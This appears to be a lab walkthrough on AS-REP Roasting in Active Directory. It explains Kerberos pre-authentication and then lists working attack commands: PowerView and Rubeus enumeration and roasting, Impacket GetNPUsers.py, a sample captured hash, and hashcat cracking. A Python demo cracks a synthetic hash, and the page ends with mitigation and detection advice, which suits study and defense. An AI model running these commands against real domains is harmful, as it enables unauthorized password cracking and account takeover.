AD101
AS-REP Roasting Attack

Definition

AS-REP Roasting is an attack against Kerberos that targets user accounts for which pre-authentication is not required. Pre-authentication is the first step of Kerberos authentication: before the KDC (the domain controller) issues a TGT, the client must prove it knows the user's password. Without that proof, anyone who can reach the KDC can ask for a TGT on the user's behalf and receive material encrypted under the user's key, which can then be guessed against offline; pre-authentication exists to stop exactly that kind of brute-force password attack.

Theory & Background

With pre-authentication, the client derives a key from the user's password (for RC4-HMAC, etype 23, this is simply the user's NT hash; for the AES etypes it is a PBKDF2-derived key), encrypts the current timestamp with it and sends the result in the AS-REQ. The domain controller decrypts the timestamp with the key it stores for that account, validates it, and only then issues the TGT that the user presents in later TGS requests.
The AS-REP has two encrypted parts: the TGT itself, encrypted with the krbtgt account's long-term key and therefore opaque to the client, and the enc-part (the enc-part field in the Wireshark snapshot), which carries the session key and is encrypted with the user's long-term key. If pre-authentication is not required for an account, an attacker can send an AS-REQ for that user without knowing any password and still receive this enc-part. Roasting tools request etype 23, so the DC encrypts it with the NT hash, and because the RC4-HMAC construction includes a keyed checksum over the plaintext, each password guess can be verified offline: derive the key from the guess, decrypt, recompute the checksum and compare. No credentials are needed for this step, only network access to the KDC (TCP/UDP 88) and a username. If you are already an authenticated but otherwise unprivileged user, you can enumerate which accounts have this setting with the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304): 1.2.840.113556.1.4.803 is the bitwise-AND matching rule and 4194304 (0x400000) is the UF_DONT_REQUIRE_PREAUTH flag.
Luckily, pre-authentication is required by default in Active Directory. It can, however, be switched off per account through the 'Do not require Kerberos preauthentication' user account control setting, which is sometimes done for compatibility with old Kerberos clients.
[email protected] configured with 'Do not require Kerberos preauthentication'
Wireshark snapshot of the AS-REQ/AS-REP exchange
My lab environment for this walkthrough:
    1. [email protected] - user with Kerberos pre-authentication disabled
    2. redwolf-dc - domain controller

Abuse

Many tools can perform an AS-REP Roasting attack; here I will demonstrate Rubeus (Windows) and GetNPUsers.py from the Impacket scripts (Linux).

Execution with Rubeus

List the users that have pre-authentication disabled (this is a PowerView command, so PowerView must be loaded into memory first):
Get-DomainUser -PreauthNotRequired
Then use Rubeus to send an AS-REQ for each such user and print the crackable enc-part on a single line (/nowrap). By default Rubeus prints John's '$krb5asrep$user@domain:...' form; add /format:hashcat to get the '$krb5asrep$23$...' form that hashcat mode 18200 expects, or /user:<name> to target one account.
.\Rubeus.exe asreproast /nowrap

Execution with GetNPUsers

Install the Impacket scripts (setup.py lives in the cloned repository, so the last step must run from /opt/impacket; the original 'sudo python3 ./setup.py install' from another directory fails to find it):
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket && sudo python3 setup.py install
Enumerate the usernames in the domain (or build a candidate list) and feed them to GetNPUsers.py. With valid domain credentials the script can query LDAP for accounts with pre-authentication disabled and request their AS-REPs (-request); without credentials, pass '-usersfile <file> -no-pass' and it sends an AS-REQ for every name in the file, which as a side effect shows which usernames exist, since the DC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for the rest. '-format hashcat' (the default) or '-format john' selects the output format.
GetNPUsers.py REDWOLF.LOCAL/[email protected] -dc-ip 192.168.62.2

Cracking the AS-REP Hash

Say this is the hash we get for the potential victim, as printed by Rubeus in John's format: the principal, a 16-byte HMAC-MD5 checksum, then the RC4 ciphertext of the enc-part:
[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213
For hashcat we need to insert '23$' (the RC4-HMAC etype number) after '$krb5asrep$', so the line has the form $krb5asrep$23$user@domain:checksum$edata; John the Ripper accepts the line as printed.
[email protected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
Then we can crack the hash with John (--format=krb5asrep) or hashcat (mode 18200, Kerberos 5 etype 23 AS-REP):
hashcat -m 18200 '[email protected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~/Wordlist/rockyou.txt
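What hashcat mode 18200 actually does with such a line, as an added worked example (this is not code from the original page, from Rubeus or from hashcat): it builds a synthetic $krb5asrep$23$ hash for a made-up password and plaintext using the RC4-HMAC (etype 23) construction of RFC 4757 with key usage 8, converts a John-style line to the hashcat form as described above, and then recovers the password from a small constructed wordlist by decrypting and recomputing the keyed checksum. The principal redwolf@REDWOLF.LOCAL is taken from the lab above; the password, confounder, plaintext and wordlist are constructed for the example, and the plaintext stands in for the DER-encoded EncASRepPart a real DC would return. MD4 is written out because hashlib's md4 is disabled on many OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; only needed here to compute NT hashes."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, word order, shift amounts)
        (lambda b, c, d: (b & c) | (~b & d), 0, range(16), (3, 7, 11, 19)),
        (lambda b, c, d: (b & c) | (b & d) | (c & d), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda b, c, d: b ^ c ^ d, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, order, shifts in rounds:
            for i, w in enumerate(order):
                a, b, c, d = d, rotl((a + f(b, c, d) + X[w] + k) & MASK32, shifts[i % 4]), b, c
        h = [(x + y) & MASK32 for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_AS_REP_ENC_PART = 8  # key usage number the KDC uses for the AS-REP enc-part


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes):
    """RFC 4757 encryption with a non-exportable key: returns (checksum, edata).
    The DC does this with the user's NT hash when it builds the AS-REP enc-part."""
    k1 = _hmac_md5(key, struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    k3 = _hmac_md5(k1, checksum)
    return checksum, rc4(k3, data)


def rc4_hmac_check(key: bytes, checksum: bytes, edata: bytes) -> bool:
    """Offline verification of one candidate key: decrypt, recompute the checksum, compare."""
    k1 = _hmac_md5(key, struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART))
    k3 = _hmac_md5(k1, checksum)
    return hmac.compare_digest(_hmac_md5(k1, rc4(k3, edata)), checksum)


def to_hashcat_format(line: str) -> str:
    """Rubeus prints John's '$krb5asrep$user@realm:...'; mode 18200 wants '23$' after the tag."""
    tag = "$krb5asrep$"
    if line.startswith(tag + "23$"):
        return line
    if line.startswith(tag):
        return tag + "23$" + line[len(tag):]
    raise ValueError("not an AS-REP hash line")


def parse_hash_line(line: str):
    """Split '$krb5asrep$23$user@realm:checksum$edata' into its three parts."""
    body = to_hashcat_format(line)[len("$krb5asrep$23$"):]
    principal, rest = body.split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, wordlist):
    """Return the first candidate whose NT hash validates the checksum, else None."""
    _, checksum, edata = parse_hash_line(line)
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), checksum, edata):
            return candidate
    return None


# Constructed sample data: password, confounder, plaintext and wordlist are made up for this example.
SAMPLE_PASSWORD = "Winter2023!"
SAMPLE_CONFOUNDER = bytes(range(8))  # 8 random bytes in a real AS-REP
SAMPLE_PLAINTEXT = b"stand-in for the DER-encoded EncASRepPart (session key, times, realm)"
WORDLIST = ["password", "Summer2023!", "Welcome1", "Winter2023!"]


def sample_hash_line() -> str:
    """The line an attacker would extract from the lab user's AS-REP, in hashcat form."""
    checksum, edata = rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), SAMPLE_PLAINTEXT, SAMPLE_CONFOUNDER)
    return f"$krb5asrep$23$redwolf@REDWOLF.LOCAL:{checksum.hex()}${edata.hex()}"


def demo() -> str:
    return crack(sample_hash_line(), WORDLIST)


if __name__ == "__main__":
    print(sample_hash_line())
    print("cracked:", demo())
```

Every guess costs one MD4, three HMAC-MD5s and one RC4 pass over the enc-part, which is why etype 23 AS-REPs crack so quickly on a GPU; the 16-byte checksum in the hash line is what lets a wrong guess be rejected without knowing anything about the plaintext.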

Mitigation

Uncheck 'Do not require Kerberos preauthentication' in the Account Options of the user account. Audit regularly for accounts that still have it set, using the LDAP filter above or PowerView's Get-DomainUser -PreauthNotRequired; where the setting cannot be removed, give the account a long random password so offline guessing is infeasible, and disable RC4 for it so the AS-REP enc-part is AES-encrypted, which is far slower to crack and needs a different hashcat mode than 18200. On the domain controller an AS-REP roast appears as event 4768 (a TGT request) with Pre-Authentication Type 0 and, when RC4 was requested, Ticket Encryption Type 0x17, which is a useful detection signature.
